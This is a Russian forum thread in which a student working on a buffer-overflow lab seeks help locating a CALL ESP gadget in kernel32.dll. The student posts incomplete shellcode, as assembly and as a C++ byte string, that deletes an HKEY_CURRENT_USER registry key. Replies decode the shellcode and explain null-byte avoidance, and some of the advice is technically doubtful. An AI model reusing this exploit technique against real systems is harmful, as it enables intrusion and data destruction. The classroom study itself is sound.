Адрес инструкции CALL ESP

@MeJlaMoPu · Регистрация: 05.06.2016

Студворк — интернет-сервис помощи студентам

Здравствуйте, подскажите пожалуйста, как найти адрес инструкции CALL ESP в библиотеке kernel32.dll? Учусь пользоваться IDA'ой но никак не получается. Открываю библиотеку с помощью IDA'ы, дальше Hex View и ищу FF D4. Но дело в том, что подобных сочетаний там много, чистого FF D4 нигде нет, есть 41 FF D4. Да и их адреса почему-то постоянно меняются. В начале показывает 00000001800BCA20, потом после переключения на IDA View и обратно показывает 00000001800BCA27, после переключения на Structures и обратно показывает 00000001800BCA28.

Добавлено через 1 час 0 минут
И ещё. Был написан шелл-код, который должен удалять ключ реестра. Может кто проверить, правильно ли он написан?

Assembler
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
push ebp
        mov ebp, esp
        lea eax, [ebp + 36]  #+байты шеллкода
        push eax
        xor eax, eax    # не читать нули
        add eax, 1
        shl eax, 31
        add eax, 1
        push eax
        mov eax, 74E93C39h  # адрес функции RegDeleteKey
        call eax
        mov eax, -1     
        push eax
        mov eax, 76C139E4h  # адрес функции ExitProcess
        call eax

C++
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
WinExec("D:\\11prjct.exe "
        "123456789012"
        // тут будет адрес возврата
        "\x55"
        "\x8B\xEC"
        "\x8D\x45\x24"      // + добавить байты для шеллкода
        "\x50"
        "\x33\xC0"      
        "\x83\xC0\x01"
        "\xC1\xE0\x1F"
        "\x83\xC0\x01"
        "\x50"
        "\xB8\xC8\xC9\xB5\x74"  // адрес функции RegDeleteKey
        "\xFF\xD0"
        "\xB8\xFF\xFF\xFF\xFF"  //  mov eax, -1
        "\x50"
        "\xB8\x64\x7F\x14\x76"  // адрес функции ExitProcess
        "\xFF\xD0"
        "test", SW_SHOW);

@Ferrari F1 · 20.06.2016, 11:20

А не проще ли сперва взять учебник по ассемблеру, получить представление об основных командах процыка, а уж потом лезть в крекинг?

@stzer · 20.06.2016, 11:35

Не по теме:

Ferrari F1, если ничего не можете сказать по теме - пройдите мимо без слов "возьми учебник". Тут человек просит не написать код, а проверить. Разницу чувствуете?

@MeJlaMoPu · 20.06.2016, 11:42 **[ТС]**

Дело в том, что это лабораторная работа. Вообще она про переполнение буфера, но в остальное понятно.
И при всём моём желании(летом книги по ассемблеру буду читать), за 2 недели разобраться проблематично. Особенно когда задачу поставили, а как делать не объяснили... Но это так, о наболевшем.
Кстати, если не сложно, посоветуйте учебник "с нуля".
Ну и всё-таки, как найти адрес инструкции CALL ESP?

@Ferrari F1 · 20.06.2016, 12:00

Сообщение от MeJlaMoPu

как найти адрес инструкции CALL ESP?

Дело в том, что таких инструкций по ходу выполнения программы может быть хоть сколько, как я считаю.
Команда call обычно используется для вызовов процедур (вместе с этим проделываются кое-какие операции со стеком и eip, но щас не об этом).
call esp означает что будет произведен переход по адресу, который содержится в регистре esp(указатель стека).

Из этого можно считать, что таких команд (call esp) в коде может быть сколь угодно много...

@Raali · 20.06.2016, 12:05

Сообщение от stzer

Разницу чувствуете?

Разницу чувствуете между C++ и ассемблером вообще

Croessmah · 20.06.2016, 12:07

MeJlaMoPu, причем здесь C++?

@stzer · 20.06.2016, 12:16

Сообщение от Raali

Разницу чувствуете между C++ и ассемблером вообще

Где связь между моим сообщением и вашим? Покажите...

Разница в том, что если человек выкладывает код C++, ему помогают. Если выложил ассемблерный код - его посылают книги сразу читать. То, что человек написал не в той теме - ну ошибся, с кем не бывает.

И еще, некоторые программисты C++ знают ассемблер. Хотя бы на уровне __asm.

@MeJlaMoPu · 20.06.2016, 12:36 **[ТС]**

Ночью пост создавал, если можно, то перенесите в аналогичную тему в форуме ассемблера.

Croessmah · 20.06.2016, 12:39

Сообщение от stzer

Разница в том, что если человек выкладывает код C++, ему помогают.

Не все, не всем, не всегда.

Сообщение от stzer

Если выложил ассемблерный код - его посылают книги сразу читать.

По c++ тоже отсылают, что ж теперь, без этого никак

Но в данном случае, Вы тоже не помогли еще,
так что же на других кидаетесь?

Сообщение от stzer

То, что человек написал не в той теме - ну ошибся, с кем не бывает.

Бывает, исправили

@MeJlaMoPu · 20.06.2016, 12:56 **[ТС]**

Как мне кажется, в строке где надо указать адрес возврата надо указать адрес, который должен передать управление шелл-коду, но так как шелл-код находится в стеке, и при этом стек перезаписан, то надо просто указать на стек. А это вроде как регистр EBP. Т.е достаточно вызвать EBP, т.е CALL EBP. Эта инструкция должна быть в kernel32.dll, ей соответствует последовательность байт FF D4. Но "чистой" последовательности FF D4 там нет, есть 41 FF D4. И это не CALL ESP. Я подозреваю, что я делаю какой-то бред, но какой - не понимаю.

@R71MT · 20.06.2016, 14:22

Сообщение от MeJlaMoPu

Да и их адреса почему-то постоянно меняются.

Не забывай, что ты сидишь под отладчиком, а он для своей работы юзает стек.
Поэтому и плывёт у тебя ESP:

Code
1
2
3
В начале показывает   -  1800BCA20, 
После переключения   -  1800BCA27, 
После переключения   -  1800BCA28,

Сообщение от MeJlaMoPu

Эта инструкция должна быть в kernel32.dll

..а причём здесь вообще эта библиотека? Ты исследуешь свой код или системную библиотеку?

ValeryS · 20.06.2016, 14:58

Сообщение от MeJlaMoPu

xor eax, eax* * # не читать нули

странный комментарий

вообще то это обнуляет регистр eax
и комментарии в ассемблере начинаются с точки с запятой
вот так

Assembler
1
xor eax, eax ;комментарий

далее

Assembler
1
2
3
4
xor eax, eax ; eax=0;
add eax, 1  ;eax=1 //eax+=1;
shl eax, 31 ;eax=0x80000000 //eax<<=31;
add eax, 1 ; eax=0x80000001  //eax+=1;

это скорее всего оптимизатор поработал
вместо простейшего

Assembler
1
mov eax=0x80000001;

0x80000001 это HKEY_CURRENT_USER
значит все это

Сообщение от MeJlaMoPu

Assembler
1
2
3
4
5
6
7
8
9
lea eax, [ebp + 36]  #+байты шеллкода
push eax
xor eax, eax   # не читать нули
add eax, 1
shl eax, 31
add eax, 1
push eax
mov eax, 74E93C39h # адрес функции RegDeleteKey
call eax

на языке Си будет выглядеть как

C
1
RegDeleteKey(HKEY_CURRENT_USER,(char*)ebp+36);

где ebp+36 адрес где лежит строка в которой записан ключ

Сообщение от MeJlaMoPu

И при всём моём желании(летом книги по ассемблеру буду читать), за 2 недели разобраться проблематично.

тут годами сидишь и то не все всегда понятно

Сообщение от MeJlaMoPu

но так как шелл-код находится в стеке, и при этом стек перезаписан, то надо просто указать на стек. А это вроде как регистр EBP.

указатель вершины стека это esp, а ebp это вспомогательный регистр, да его используют как вспомогательный указатель стека, но можно и использовать как просто регистр

ФедосеевПавел · 20.06.2016, 15:13

Я только краем уха слышал, что при создании шелл-кода нельзя применять настоящий 0x00, т.к. число 0 является признаком конца строки. Отсюда и все манипуляции с числами для ухода от прямого нуля в строках.

@MeJlaMoPu · 20.06.2016, 15:14 **[ТС]**

Я исследую системную библиотеку. В ней пытаюсь найти адрес инструкции CALL ESP. Но дело в том, что я сомневаюсь, что адрес найден правильно. Адрес начала образа kernel32.dll в памяти я знаю. Если я не ошибаюсь, их надо сложить, чтобы получился адрес инструкции CALL ESP в системе. Почему менялся, до меня вроде как дошло(мозг надо включать). Теперь просто хочу узнать, правильный адрес это 6B8BBE28?

Да, надо указать на регистр ESP. Надеюсь, очепятка.

ValeryS · 20.06.2016, 15:26

Сообщение от MeJlaMoPu

исследую системную библиотеку. В ней пытаюсь найти адрес инструкции CALL ESP.

а ты уверен что она там есть?

я вообще её редко встречал

@MeJlaMoPu · 20.06.2016, 15:30 **[ТС]**

Сообщение от ValeryS

а ты уверен что она там есть?
я вообще её редко встречал

Ну если верить всевозможным статьям из интернета, то она должна быть там. Но самое подробное описание это:
"Одна из DLL, которые использует наша программа - KERNEL32.DLL. Попробуем найти в ней инструкцию CALL [ESP] или JMP [ESP]. Этим инструкциям соответствуют последовательности байтов 0xff 0xd4 и 0xff 0xe4. Для поиска можно использовать дебагер вроде SoftICE и просмотреть всё адресное пространство программы в области, где загружена KERNEL32.DLL (эта область начинается с Image Base, указанного в файле DLL). А можно искать просто в файле KERNEL32.DLL. Тогда лучше использовать какой-нибудь специльный HEX-редактор вроде HIEW, который указывает не только смещения байтов в файле, но и адреса, по которым они будут загружены в память. Положим что инструкция CALL [ESP] нашлась по адресу 0xbff794b3 (В общем этот адрес зависит от используемой версии KERNEL32.DLL)"

ValeryS · 20.06.2016, 16:11

Сообщение от MeJlaMoPu

CALL [ESP]

это не совсем то, что

Сообщение от MeJlaMoPu

CALL ESP

точнее совсем не то

первая вызывает функцию адрес которой лежит в стеке,вторая функцию которая сама лежит в стеке
рекомендую ознакомится с автором Крис Касперски
в частности книги "Искусство дизасемблирования", и "Фундаментальные основы хакерства"
беда в том что х86 построен по архитектуре фон Немана, которая в отличии от гарвардской, позволяет держать коды и данные в одном месте, и смешение на 1 байт даст совершенно другой листинг

@MeJlaMoPu · 20.06.2016, 16:25 **[ТС]**

Сообщение от ValeryS

точнее совсем не то
первая вызывает функцию адрес которой лежит в стеке,вторая функцию которая сама лежит в стеке
рекомендую ознакомится с автором Крис Касперски
в частности книги "Искусство дизасемблирования", и "Фундаментальные основы хакерства"
беда в том что х86 построен по архитектуре фон Немана, которая в отличии от гарвардской, позволяет держать коды и данные в одном месте, и смешение на 1 байт даст совершенно другой листинг

ОГРОМНОЕ спасибо, летом буду эти книжки читать. Как я понял, адрес CALL [ESP] из системной библиотеки извлечь проблематично, если не х86?

ValeryS · 20.06.2016, 16:29

Сообщение от MeJlaMoPu

Как я понял, адрес CALL [ESP] из системной библиотеки извлечь проблематично, если не х86?

конечно

потому что там может просто не быть этого регистра
но тут одна тонкость, я не знаю такой винды, которая работает не на х86

Новые блоги и статьи Все статьи Все блоги /
Access VikBal 11.12.2025 Помогите пожалуйста !! Как объединить 2 одинаковые БД Access с разными данными.	Новый ноутбук volvo 07.12.2025 Всем привет. По скидке в "черную пятницу" взял себе новый ноутбук Lenovo ThinkBook 16 G7 на Амазоне: Ryzen 5 7533HS 64 Gb DDR5 1Tb NVMe 16" Full HD Display Win11 Pro	Музыка, написанная Искусственным Интеллектом volvo 04.12.2025 Всем привет. Некоторое время назад меня заинтересовало, что уже умеет ИИ в плане написания музыки для песен, и, собственно, исполнения этих самых песен. Стихов у нас много, уже вышли 4 книги, еще 3. . .	От async/await к виртуальным потокам в Python IndentationError 23.11.2025 Армин Ронахер поставил под сомнение async/ await. Создатель Flask заявляет: цветные функции - провал, виртуальные потоки - решение. Не threading-динозавры, а новое поколение лёгких потоков. Откат?. . .	Поиск "дружественных имён" СОМ портов Argus19 22.11.2025 Поиск "дружественных имён" СОМ портов На странице: https:/ / norseev. ru/ 2018/ 01/ 04/ comportlist_windows/ нашёл схожую тему. Там приведён код на С++, который показывает только имена СОМ портов, типа,. . .
Сколько Государство потратило денег на меня, обеспечивая инсулином. Programma_Boinc 20.11.2025 Сколько Государство потратило денег на меня, обеспечивая инсулином. Вот решила сделать интересный приблизительный подсчет, сколько государство потратило на меня денег на покупку инсулинов. . . .	Ломающие изменения в C#.NStar Alpha Etyuhibosecyu 20.11.2025 Уже можно не только тестировать, но и пользоваться C#. NStar - писать оконные приложения, содержащие надписи, кнопки, текстовые поля и даже изображения, например, моя игра "Три в ряд" написана на этом. . .	Мысли в слух kumehtar 18.11.2025 Кстати, совсем недавно имел разговор на тему медитаций с людьми. И обнаружил, что они вообще не понимают что такое медитация и зачем она нужна. Самые базовые вещи. Для них это - когда просто люди. . .	Создание Single Page Application на фреймах krapotkin 16.11.2025 Статья исключительно для начинающих. Подходы оригинальностью не блещут. В век Веб все очень привыкли к дизайну Single-Page-Application . Быстренько разберем подход "на фреймах". Мы делаем одну. . .	Фото: Daniel Greenwood kumehtar 13.11.2025

@Ferrari F1 807 / 534 / 158 Регистрация: 27.01.2015 Сообщений: 3,017 Записей в блоге: 1
	20.06.2016, 11:20
	А не проще ли сперва взять учебник по ассемблеру, получить представление об основных командах процыка, а уж потом лезть в крекинг? 0

@stzer
	20.06.2016, 11:35
	Не по теме: Ferrari F1, если ничего не можете сказать по теме - пройдите мимо без слов "возьми учебник". Тут человек просит не написать код, а проверить. Разницу чувствуете? 0

@MeJlaMoPu 0 / 0 / 0 Регистрация: 05.06.2016 Сообщений: 10
	20.06.2016, 11:42 [ТС]
	Дело в том, что это лабораторная работа. Вообще она про переполнение буфера, но в остальное понятно. И при всём моём желании(летом книги по ассемблеру буду читать), за 2 недели разобраться проблематично. Особенно когда задачу поставили, а как делать не объяснили... Но это так, о наболевшем. Кстати, если не сложно, посоветуйте учебник "с нуля". Ну и всё-таки, как найти адрес инструкции CALL ESP? 0

Croessmah Неэпический 18144 / 10728 / 2066 Регистрация: 27.09.2012 Сообщений: 27,026 Записей в блоге: 1
	20.06.2016, 12:07
	MeJlaMoPu, причем здесь C++? 0

@MeJlaMoPu 0 / 0 / 0 Регистрация: 05.06.2016 Сообщений: 10
	20.06.2016, 12:36 [ТС]
	Ночью пост создавал, если можно, то перенесите в аналогичную тему в форуме ассемблера. 0

@MeJlaMoPu 0 / 0 / 0 Регистрация: 05.06.2016 Сообщений: 10
	20.06.2016, 12:56 [ТС]
	Как мне кажется, в строке где надо указать адрес возврата надо указать адрес, который должен передать управление шелл-коду, но так как шелл-код находится в стеке, и при этом стек перезаписан, то надо просто указать на стек. А это вроде как регистр EBP. Т.е достаточно вызвать EBP, т.е CALL EBP. Эта инструкция должна быть в kernel32.dll, ей соответствует последовательность байт FF D4. Но "чистой" последовательности FF D4 там нет, есть 41 FF D4. И это не CALL ESP. Я подозреваю, что я делаю какой-то бред, но какой - не понимаю. 0

ФедосеевПавел Модератор 8644 / 4479 / 1669 Регистрация: 01.02.2015 Сообщений: 13,883 Записей в блоге: 11
	20.06.2016, 15:13
	Я только краем уха слышал, что при создании шелл-кода нельзя применять настоящий 0x00, т.к. число 0 является признаком конца строки. Отсюда и все манипуляции с числами для ухода от прямого нуля в строках. 0

@MeJlaMoPu 0 / 0 / 0 Регистрация: 05.06.2016 Сообщений: 10
	20.06.2016, 15:14 [ТС]
	Я исследую системную библиотеку. В ней пытаюсь найти адрес инструкции CALL ESP. Но дело в том, что я сомневаюсь, что адрес найден правильно. Адрес начала образа kernel32.dll в памяти я знаю. Если я не ошибаюсь, их надо сложить, чтобы получился адрес инструкции CALL ESP в системе. Почему менялся, до меня вроде как дошло(мозг надо включать). Теперь просто хочу узнать, правильный адрес это 6B8BBE28? Да, надо указать на регистр ESP. Надеюсь, очепятка. Миниатюры 0

Адрес инструкции CALL ESP

Решение